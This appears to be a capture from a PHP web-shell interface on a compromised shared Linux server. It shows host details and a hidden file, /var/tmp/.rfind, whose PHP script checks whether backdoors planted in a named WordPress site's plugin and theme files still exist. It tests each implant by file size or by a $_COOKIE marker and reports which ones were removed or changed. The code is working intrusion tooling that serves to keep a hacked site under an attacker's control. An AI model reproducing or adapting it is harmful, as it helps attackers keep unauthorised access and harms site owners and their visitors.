HEX
Server: Apache
System: Linux iad1-shared-b8-33 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: samfetchero1 (10301780)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //var/tmp/.rfind
<?php   $r = '/home/panoutreach/domains/panoutreach.org/public'; $x = ["/wp-content/plugins/captainform/captainform.php"=>"bd@@756227@@3489",
"/wp-content/plugins/contact_1751125354/wp-config.php"=>"bd@@732829@@727",
"/wp-content/themes/page-builder-framework/inc/integration/beaver-themer.php"=>"bd@@396451@@$_COOKIE[6",
"/wp-content/plugins/analytics-1748029289/archlve.php"=>"bd@@267176@@727"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');